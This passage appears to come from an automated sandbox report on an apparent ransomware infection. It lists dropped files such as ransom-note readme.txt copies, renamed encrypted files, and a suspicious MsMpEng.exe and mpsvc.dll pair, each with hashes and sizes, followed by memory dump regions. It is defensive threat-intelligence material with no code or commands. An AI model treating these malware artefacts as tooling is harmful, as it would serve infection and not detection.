                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d08653aab9164b2bf6014f753daac8907784a2eb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b5591a3a4cfa9a05d97d3a89aca7ff6d2beb47296816f1e2f041d3ea6f134b7d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  660c05764c8ff9de79ed076507386d189601150a18419f6dd9cf778b470afa2d230899f639f282e1f66fc19163bb1b5cf9a5255f241a980f92238268a68cb608

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Public\Music\r9p1525r-readme.txt.hauhitec

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b6b623a9a5f7ec0e2ba5a68ec10a5561

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f064b15158fd4200fc64025f3bcd54343b4fe98f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4df2280518e3b2eae32fc9e250be1118077fb432406c2f192a297b1c5b1f4a72

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  326a2f9b36caff66f40c6adb102ca1d42f4e4d7db8d4b1d559706780b9b4e483588d602ffe7886690b78b3d605660be174b89452637e8367a9a17630c353abbc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\r9p1525r-readme.txt

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b93fbc85141f5d833dc2dabf3e566155

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b191d80e4fd6c7708232951e6780e00322774950

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a87ba6e1ab58f0fbce1056f379d5749f1aa5f96f2e3c535c5b523a99c1b63d59

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  954cfcd6827afbeb0943b34301faadf9a304fa5ea66c84054f4d26e252cff0982163a99f4544b81c7052924cc5a87a941169a03ffaea57bb3a3b0c5debaf5734

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\readme.txt

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c4d7141070470eb93aeec6160d607d4f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  54e86fabff168c0ec8c9a012450e7e48ffcfecf5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9e11daff054fa9775965355467c27c931a0ef4602c34684c057438c10c18a153

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1e203c4681208fa4d28d969227dda74e8a2ec50c83ea43f7c61fc613a0f2cd1e481f937afd435e20448b591215522fff80942580ea81bdf531dca4ed61b81b53

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\MsMpEng.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  21KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8cc83221870dd07144e63df594c391d9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3d409b39b8502fcd23335a878f2cbdaf6d721995

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e7f964a10a8799310a519fa569d264f652e13cc7ea199792dc6a5c0507dec4a12844a87bf8bab714255dce717839908ed5d967ce8f65f5520fe4e7f9d25a622c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\mpsvc.dll

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  789KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a47cf00aedf769d60d58bfe00c0b5421

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  656c4d285ea518d90c1b669b79af475db31e30b1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4c2dcad3bd478fa70d086b7426d55976caa7ffc3d120c9c805cbb49eae910123c496bf2356066afcacba12ba05c963bbb8d95ed7f548479c90fec57aa16e4637

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\vcredist2022_x64_001_vcRuntimeAdditional_x64.log.QLTRT.WENZW

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  131KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a4600bcd1b6f9ea1420f8264cd7a4392

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c5887f7c22f0abefb466e7147bec56e7ee4ed3d7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  47146b7cdb23c55f96d74d16429528cb29a418297f3603a387f76fd78b5ccd37

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1fa3b1f5a488b9e7a18bf9867dee1a7389fb57f059b0701c97e35cd1a9dd1c29e87b43fcfa1faacb4a2e13be0cf761aca26ce468a52c861d0950455bbbdc46a6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • F:\$RECYCLE.BIN\S-1-5-21-2878641211-696417878-3864914810-1000\desktop.ini

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  129B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a526b9e7c716b3489d8cc062fbce4005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  804B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  249a83440d0ed559cb7de26148de3e1a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6b6f79f57172ac1eb1d9f3cf6af795cf2b4804ed

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5ec9530aeda4738c032bd0999cf17c588da201c2dc45ae63d5ae57142bab6d60

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  33b36e4634f62e0111c1b82901015e3eafb6195b0e60ca3d5e6d3cb5b19a2a2d6f3a2fb48bf6f3776cee994e4c3cbfe89827b304f14f4f3def9cb629e7cdc95e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/116-2290-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/392-239-0x00000000056F0000-0x0000000005C94000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/392-697-0x0000000006A60000-0x0000000006A82000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/392-230-0x0000000000890000-0x000000000092E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  632KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/1080-289-0x0000018E99610000-0x0000018E9963A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  168KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/1132-228-0x0000000000070000-0x00000000000BE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  312KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/1412-249-0x0000000000E50000-0x0000000000ED6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  536KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/1412-292-0x0000000005760000-0x000000000578A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  168KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/1808-1040-0x0000000000400000-0x00000000005BB000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/1808-279-0x0000000000400000-0x00000000005BB000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/2764-1486-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3084-419-0x0000000000400000-0x0000000000531000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3084-400-0x000000006FFF0000-0x0000000070000000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3084-418-0x0000000076470000-0x0000000076610000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3084-402-0x000000006FFF0000-0x0000000070000000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3084-391-0x0000000000400000-0x0000000000531000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3084-417-0x0000000076F10000-0x0000000077000000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  960KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3084-401-0x000000006FFF0000-0x0000000070000000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3116-197-0x00000275FCD50000-0x00000275FCD72000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3116-210-0x00000275FF350000-0x00000275FF36E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3116-208-0x00000275FF390000-0x00000275FF406000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  472KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3116-207-0x00000275FCDF0000-0x00000275FCE34000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  272KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3896-174-0x0000021ED6B70000-0x0000021ED6B71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3896-168-0x0000021ED6B70000-0x0000021ED6B71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3896-175-0x0000021ED6B70000-0x0000021ED6B71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3896-176-0x0000021ED6B70000-0x0000021ED6B71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3896-177-0x0000021ED6B70000-0x0000021ED6B71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3896-178-0x0000021ED6B70000-0x0000021ED6B71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3896-179-0x0000021ED6B70000-0x0000021ED6B71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3896-180-0x0000021ED6B70000-0x0000021ED6B71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3896-169-0x0000021ED6B70000-0x0000021ED6B71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3896-170-0x0000021ED6B70000-0x0000021ED6B71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3924-6133-0x00000000069B0000-0x0000000006A1E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  440KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3924-287-0x0000000000850000-0x00000000008BE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  440KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3924-5288-0x00000000063D0000-0x0000000006438000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  416KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3932-286-0x0000000004F70000-0x0000000004FD6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/3932-272-0x00000000006C0000-0x00000000006E2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4080-261-0x00000000002C0000-0x00000000002DC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  112KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4080-291-0x0000000000890000-0x0000000000896000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4544-9978-0x00000000004E0000-0x00000000005C4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  912KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4544-11342-0x0000000002730000-0x0000000002740000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4624-243-0x0000000007C90000-0x0000000007F44000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4624-244-0x0000000005BB0000-0x0000000005C06000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  344KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4624-240-0x0000000000EC0000-0x0000000000FF2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4792-237-0x0000000005360000-0x00000000053F2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  584KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4792-238-0x00000000054B0000-0x000000000554C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  624KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4792-229-0x0000000000A30000-0x0000000000ACE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  632KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4792-437-0x0000000006890000-0x00000000068B8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  160KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4840-1042-0x0000000000E10000-0x0000000000F08000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  992KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4956-1036-0x0000000000400000-0x0000000000633000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5116-3593-0x0000000006BB0000-0x0000000006C16000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5116-241-0x0000000005550000-0x000000000555A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5116-231-0x0000000000B50000-0x0000000000BD2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  520KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5116-3553-0x0000000006BB0000-0x0000000006C1C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  432KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5116-3486-0x00000000067C0000-0x0000000006836000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  472KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5116-3485-0x00000000066D0000-0x0000000006746000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  472KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5116-3594-0x0000000006BB0000-0x0000000006C16000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5116-7033-0x0000000006CA0000-0x0000000006CBE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5152-1043-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5204-623-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5308-982-0x0000000000BA0000-0x0000000000BC2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5316-483-0x0000000000400000-0x000000000057A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5332-1041-0x000000001D1C0000-0x000000001D6FE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5332-1140-0x000000001BBC0000-0x000000001BC5C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  624KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5332-1030-0x000000001CCF0000-0x000000001D1BE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5336-763-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5340-1021-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

